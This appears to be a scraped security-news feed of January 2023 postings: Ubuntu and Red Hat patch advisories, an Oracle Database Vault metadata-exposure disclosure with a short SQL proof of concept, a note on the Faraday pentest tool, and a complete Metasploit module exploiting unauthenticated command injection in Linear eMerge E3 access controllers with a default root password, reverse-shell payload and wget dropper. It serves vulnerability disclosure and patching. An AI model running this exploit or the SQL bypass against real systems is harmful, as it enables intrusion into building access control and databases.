Ubuntu Security Notice 5786-1 - It was discovered that GNOME Files incorrectly handled certain filenames. An attacker could possibly use this issue to cause GNOME Files to crash, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5786-1  
January 05, 2023

nautilus vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

GNOME Files could be made to crash if it opened a specially crafted file.

Software Description:  
- nautilus: file manager and graphical shell for GNOME

Details:

It was discovered that GNOME Files incorrectly handled certain filenames.  
An attacker could possibly use this issue to cause GNOME Files to crash,  
leading to a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   nautilus                        1:43.0-1ubuntu2.1

Ubuntu 22.04 LTS:  
   nautilus                        1:42.2-0ubuntu2.1

Ubuntu 20.04 LTS:  
   nautilus                        1:3.36.3-0ubuntu1.20.04.2

Ubuntu 18.04 LTS:  
   nautilus                        1:3.26.4-0~ubuntu18.04.6

After a standard system update you need to restart your session to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5786-1  
   CVE-2022-37290

Package Information:  
   https://launchpad.net/ubuntu/+source/nautilus/1:43.0-1ubuntu2.1  
   https://launchpad.net/ubuntu/+source/nautilus/1:42.2-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/nautilus/1:3.36.3-0ubuntu1.20.04.2  
   https://launchpad.net/ubuntu/+source/nautilus/1:3.26.4-0~ubuntu18.04.6

Ubuntu Security Notice USN-5786-1

Red Hat Security Advisory 2023-0021-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:0021-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0021  
Issue date:        2023-01-04  
CVE Names:         CVE-2022-42856   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: processing maliciously crafted web content may lead to an  
arbitrary code execution (CVE-2022-42856)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2153683 - CVE-2022-42856 webkitgtk: processing maliciously crafted web content may lead to an arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.36.7-1.el9_1.1.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.1.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.1.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.1.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.1.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.1.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.1.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.1.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.1.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42856  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7Wqj9zjgjWX9erEAQg9lg/+MOfUiSATG58e1aJdZzVtFA5hv1x1PWC3  
/F+rP2/89vYYk/PLOSjySGdelAEYgw7Uq8UW6sPMkleTRvyakUaYhE9joubGcYNM  
XKAtZDbLVGVzQxEggI7VxHRaFZvyMNWItb8SKloiD14EPuuI/W32g9Seep3L6xZ3  
ufdqgmCyVLILPRMREXYZgfYo0PsJqLL0qOwfL4KWhh6BDQpgdLvndjWzbfZiVKzO  
Rnr/x7o62SiEtgcSCCowoR35/NEJkzoCnbrD91UlgFUKby1siTbSr1KItPbP1y7L  
QiWSOBWph5pVZHKAiThYFHmGNbL04s10D3gVhB+MKZ+6AO/NjdmlU27Rg49ps9GV  
yLam6qcuWhNKbMafeOHleBeTRizSWmnKVefOWil/2FnNnzFhcEKJ3dILzjXIQSB/  
WyFAUqYG8qkha2buYpx4zEjq20jLngQQ/s00fDAnJlsjasMhyBLSGy+fvgmaQ6wN  
xs7gYg9+ouhnA3qJytkcQXj9Qaryvf9YmmY6uBLa7F5BUwtJ/w3E9n4pVFNmqEFq  
GD1SabvR9BfwO/7wQgyIBKSFMSRUtXpGV1MZp+FaQFKgJ/7Bgh0wNOy2t5MstPEf  
jvzsYdVUFZRfYwUNMNyA7Vsm6E2cnE52cLNEKuBxRdESAO11qrNzPIkYaF9DTmW3  
jFzs9D1IFKw=  
=FE4s  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0021-01

Oracle Database versions 12.1.0.2, 12.2.0.1, 18c, and 19c suffer from a vault metadata exposure vulnerability.

    Title: CVE-2021-2175 – Oracle Database Vault Metadata Exposure VulnerabilityProduct:                   DatabaseManufacturer:              OracleAffected Version(s):       12.1.0.2, 12.2.0.1, 18c, 19cTested Version(s):         19cRisk Level:                lowSolution Status:           FixedCVE Reference:             CVE-2021-2175Author of Advisory:        Emad Al-MousaOverview:Oracle database vault is a security feature that imposes segregation of duties such as account managemenet, authorization,....etc. So, in a nutshell a DBA/System Admin with access to "SYS" user has limited power in terms of data viewership, account creation,.....etc. The powers of SYS account are stripped down.*****************************************Vulnerability Details:Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data [Meta-data].*****************************************Proof of Concept (PoC):The DBA_DV_REALM data dictionary view lists the realms (security policies configured for data protection) created in the current database instance, such information SYS user by default has NO ACCESS to since it exposes what security measures of data protection is configured.Access the database as SYS account:sqlplus / as sysdbaSQL> SELECT *  FROM DBA_DV_REALM;ERROR at line 1:ORA-01031: insufficient privileges// as expected SYS account can't view the database view contents.....However...let us do the following:SQL> create view ORACLE_OCM.DUMMY_V as select * from DBA_DV_REALM;SQL> select * from ORACLE_OCM.DUMMY_V;// ORACLE_OCM account is misconfigured and was granted extra access to the view so when you create the view under it....you will be access the view content....and now you can see/view the vault realm policies are configured to protect what exactly within the database system.*****************************************References:https://www.oracle.com/security-alerts/cpuapr2021.htmlhttps://databasesecurityninja.wordpress.com/2022/02/02/cve-2021-2175-database-vault-metadata-exposure-vulnerability/https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-2175Credit:Emad Al-Mousa: CVE-2021-35576

Oracle Database Vault Metadata Exposure

This Metasploit module exploits a command injection vulnerability in the Linear eMerge E3-Series Access Controller. The Linear eMerge E3 versions 1.00-06 and below are vulnerable to unauthenticated command injection in card_scan_decoder.php via the No and door HTTP GET parameter. Successful exploitation results in command execution as the root user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Linear eMerge E3-Series Access Controller Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in the Linear eMerge          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable          to unauthenticated command injection in card_scan_decoder.php via the  `No` and `door` HTTP GET parameter.          Successful exploitation results in command execution as the `root` user.        },        'License' => MSF_LICENSE,        'Author' => [          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor        ],        'References' => [          [ 'CVE', '2019-7256'],          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],          [ 'URL', 'https://na.niceforyou.com/' ],          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],          [ 'EDB', '47649'],          [ 'PACKETSTORM', '155256']        ],        'DisclosureDate' => '2019-10-29',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_ARMLE],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_ARMLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('ROOT_PASSWORD', [ true, 'default root password on a vulnerable Linear eMerge E3-Series access controller', 'davestyle']),      ]    )  end  def execute_command(cmd, _opts = {})    random_no = rand(30..100)    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),      'vars_get' =>        {          'No' => random_no,          'door' => "`echo #{datastore['ROOT_PASSWORD']}|su -c \"#{cmd}\"`"        }    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution  def check    print_status("Checking if #{peer} can be exploited.")    sleep_time = rand(2..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    return CheckCode::Unknown('No response received from the target!') unless res    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200 && !res.body.blank? && res.body =~ /"card_format_default":"/    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time    CheckCode::Vulnerable('Successfully tested command injection.')  end  def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager(linemax: 262144)    end  endend

Linear eMerge E3-Series Access Controller Command Injection

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Faraday 4.3.2

Ubuntu Security Notice 5785-1 - It was discovered that FreeRADIUS incorrectly handled multiple EAP-pwd handshakes. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 18.04 LTS. Shane Guan discovered that FreeRADIUS incorrectly handled memory when checking unknown SIM option sent by EAP-SIM supplicant. An attacker could possibly use this issue to cause a denial of service on the server. This issue only affected Ubuntu 16.04 ESM, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.

=========================================================================  
Ubuntu Security Notice USN-5785-1  
January 04, 2023

freeradius vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in FreeRADIUS.

Software Description:  
- freeradius: high-performance and highly configurable RADIUS server

Details:

It was discovered that FreeRADIUS incorrectly handled multiple EAP-pwd  
handshakes. An attacker could possibly use this issue to cause a denial of  
service. This issue only affected Ubuntu 18.04 LTS. (CVE-2019-17185)

Shane Guan discovered that FreeRADIUS incorrectly handled memory when  
checking unknown SIM option sent by EAP-SIM supplicant. An attacker could  
possibly use this issue to cause a denial of service on the server. This  
issue only affected Ubuntu 16.04 ESM, Ubuntu 18.04 LTS and Ubuntu 20.04  
LTS. (CVE-2022-41860)

It was discovered that FreeRADIUS incorrectly handled memory when  
processing certain abinary attributes. An attacker could possibly use this  
issue to cause a denial of service on the server. (CVE-2022-41861)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  freeradius                      3.0.26~dfsg~git20220223.1.00ed0241fa-0ubuntu3.1

Ubuntu 20.04 LTS:  
  freeradius                      3.0.20+dfsg-3ubuntu0.2

Ubuntu 18.04 LTS:  
  freeradius                      3.0.16+dfsg-1ubuntu3.2

Ubuntu 16.04 ESM:  
  freeradius                      2.2.8+dfsg-0.1ubuntu0.1+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5785-1  
  CVE-2019-17185, CVE-2022-41860, CVE-2022-41861

Package Information:  
  https://launchpad.net/ubuntu/+source/freeradius/3.0.26~dfsg~git20220223.1.00ed0241fa-0ubuntu3.1  
  https://launchpad.net/ubuntu/+source/freeradius/3.0.20+dfsg-3ubuntu0.2  
  https://launchpad.net/ubuntu/+source/freeradius/3.0.16+dfsg-1ubuntu3.2

Ubuntu Security Notice USN-5785-1

Red Hat Security Advisory 2022-9108-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.11.21 extras and security update  
Advisory ID:       RHSA-2022:9108-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9108  
Issue date:        2023-01-04  
CVE Names:         CVE-2022-41912  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.11.21 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2022:9107

Security Fix(es):

* crewjam/saml: Authentication bypass when processing SAML responses  
containing multiple Assertion elements (CVE-2022-41912)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

See the following documentation, which will be updated shortly for this  
release, for important instructions on how to upgrade your cluster and  
fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2149181 - CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements

5. References:

https://access.redhat.com/security/cve/CVE-2022-41912  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7VWMdzjgjWX9erEAQiBjBAAoG863udcy+0xMJjGdOyj2ulRyF46w58Z  
bRA2pJSCqc/Dc9dYkbDGPYwhU7RwWsC+L9SBCHqA57f3qf08qG7Z+6xpSu+aic8R  
DvQlzeFtHuzBgi+eEK1E1BvbC65VhT0z3IR+7J+VicxfkrEfGfPsecCIFxWrcKiB  
CLMBtJmgxCZpIpUMJjDOaN7PJU8R23k5ZdCiMGjaYHoWxSE23+/p7HXOvR3YT1bU  
Ioh0Nh9gLv0DdqP5MZhJRdYfKHclipUasdTRSPasqdqGv15jSh4XExj3JfKmMIDj  
lNOfkXoJ7kIK6DZEa/NNDZBwStQ0hr7zeJkW9xBq+PFSPxU9jlq14ULBMupCTYdF  
SafF1X5bdWlxgC/njwKxIpM8xUSop2hMIpFw4OlbOIuRXCht9GBh3KqaLjtB+HLU  
nU/jBkRWPGbjJRT0sOXlFYV8d28CvGurIihhJ0eN4ZAAiBiKfDA/Y1yrL6SNwBNj  
E03FWKjvB8N/pPvGoL3kaElRAQJC7DVTY/MCDi3sZnpxUKBZYruq2RD/zNAuiN5R  
U+ibqLArF9LbT7aVG7YSCplXxgCKDRIBw2fw+JWQkmBSYZMoqGxX2jgh4RIQJx9c  
A0PLEjcLECzV8IfDI0z0QfPOpsPUSa5ILp05W/qDvkfXoUsQyr4qPvcYDQWQ/rh+  
yp8JQJpojCw=LVLE  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9108-01

Red Hat Security Advisory 2022-9107-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.21. There are no RPM packages for this release. Space precludes documenting all of the container images in this advisory.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.11.21 bug fix and security update  
Advisory ID:       RHSA-2022:9107-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9107  
Issue date:        2023-01-04  
CVE Names:         CVE-2022-27191  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.11.21 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.11.21. There are no RPM packages for this release.

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

Security Fix(es):

* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures.

The image digests may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags  
The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:860cc37824074671c4cf76e02d224d243e670d2298e6dab8923ee391fbd0ae1c

(For s390x architecture)  
The image digest is  
sha256:c13f2568209ec574f6b7443c013f272e1851f866a0ab38f80805f8bb7e91373b

(For ppc64le architecture)  
The image digest is  
sha256:85a473a3fe31d7906ee17084e6fcf815d2f1e3403b6000e34f27b609da244a7c

(For aarch64 architecture)  
The image digest is  
sha256:0a255cc0a6ef305e41a5808525ec5e7f625b916c3257444e6ad87a0351a99e4c

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server  
2067989 - Should not exit with code 1 when only has warning

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-2123 - [Azure]Availability Set will be created when vmSize is invalid in a region which has zones  
OCPBUGS-2443 - Help popovers cause error on Observe > Alerting pages  
OCPBUGS-3116 - [2117255] Failed to dump flows for flow sync, stderr: "ovs-ofctl: br-ext is not a bridge or a socket"  
OCPBUGS-3614 - [4.11] [perf/scale] libovsdb builds transaction logs but throws them away  
OCPBUGS-3674 - metal3 pod crashloops on OKD in BareMetal IPI or assisted-installer bare metal installations  
OCPBUGS-4103 - Unable to use application credentials for Cinder CSI after OpenStack credentials update  
OCPBUGS-4324 - Backport PodNetworkConnectivityCheck for must-gather  
OCPBUGS-4376 - Grafana tests fail on the release-4.11 branch with Go 1.18 [4.11.z]  
OCPBUGS-4386 - [2107531] Implement upstream fix for kube-proxy: fix duplicate port opening #107413  
OCPBUGS-4405 - Azure UPI installation failed to scale up worker nodes using machinests  
OCPBUGS-4408 - 4.11: When adding nodes, the overlapped node-subnet can be allocated.  
OCPBUGS-4529 - [OSP]Enhancement: suppress the misleading error logs for cloud-network-config-controller pod  
OCPBUGS-4564 - [4.11] Pod stuck in containerCreating state when the node on which it is running is Terminated  
OCPBUGS-4618 - [4.11] OVN silently failing in case of a stuck pod  
OCPBUGS-4640 - Prometheus continuously restarts due to slow WAL replay  
OCPBUGS-4655 - [4.11] ovn-kubernetes ovnkube-master containers crashlooping after 4.11.0-0.okd-2022-10-15-073651 update  
OCPBUGS-4797 - OLM generates invalid component selector labels  
OCPBUGS-4838 - [4.11] Pod LSP missing from PortGroup  
OCPBUGS-4860 - [4.11] Network Policy executes duplicate transactions for every pod update  
OCPBUGS-4887 - [4.11] Pods completed + deleted may leak  
OCPBUGS-4992 - Windows East-West networking test fails for pod to pod communication

6. References:

https://access.redhat.com/security/cve/CVE-2022-27191  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7VWNNzjgjWX9erEAQhH1w/+IiGHQgsI2ekcyI7Eiej8biZQZCITYD6b  
0FtSjLZCJg8qrid6q48tfQPspX4MT5PTYZTHmxFSoPkkqffPgGkyvUAgGjZRPyVO  
YGNljUfpElYeZHGt5eLim6YK2l8ioFwU/cIF0OMrXd+Ymke70CGtUwwkp1ULPQ/N  
nonsls9+sIV4mPI0//FSPXZLYC/rNT21lK2fu6l/XNWp1CvFuMqJhVYzxr3xce7M  
Bdf3J2lxHgQgeUDjmUnGrQLqxI+YAnQiAPgLAS0EujBJafqflFp43SR0gc7hXzX3  
AqTmq3nOPOot+Ze/JnMkHr6z826wHpDP9ryWgcJve0EP6djdDKhOrw8iQO7vkvtS  
o1PFF5IgVtU3zFdAEpswSYcUaqZ44WV3jHS6BI50WtfYCIMQTJdeoUAUR83/xMYJ  
SuI7NnRM3i+riD0+9nKrISrk88Q0xmyJwABtJaTPFDDncorEekqp+H88NENFNOXw  
tK1eSH0kzxq37QQT96NWSVuy54jaIDvz8D2OzXo36wuSVZ7WoX3xDAz1javwUHxe  
LUvv9O2Wn0hmJVBFv5x3c9oEtbl420wtjAPPAQNr1FyP+gYuzdTPFEWlgKnqU55Q  
Bk/IM+E+1+THhQrMKeU3UW+l+cJ/czf3NZIBU9oyGT4Ccx0I8uvffmq16aU89qeR  
+sXb8sy0u3A=bJCq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9107-01

Red Hat Security Advisory 2023-0016-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:0016-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0016  
Issue date:        2023-01-04  
CVE Names:         CVE-2022-42856  
====================================================================  
1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: processing maliciously crafted web content may lead to an  
arbitrary code execution (CVE-2022-42856)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2153683 - CVE-2022-42856 webkitgtk: processing maliciously crafted web content may lead to an arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.36.7-1.el8_7.1.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el8_7.1.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.1.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.1.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.1.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.1.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.1.aarch64.rpm  
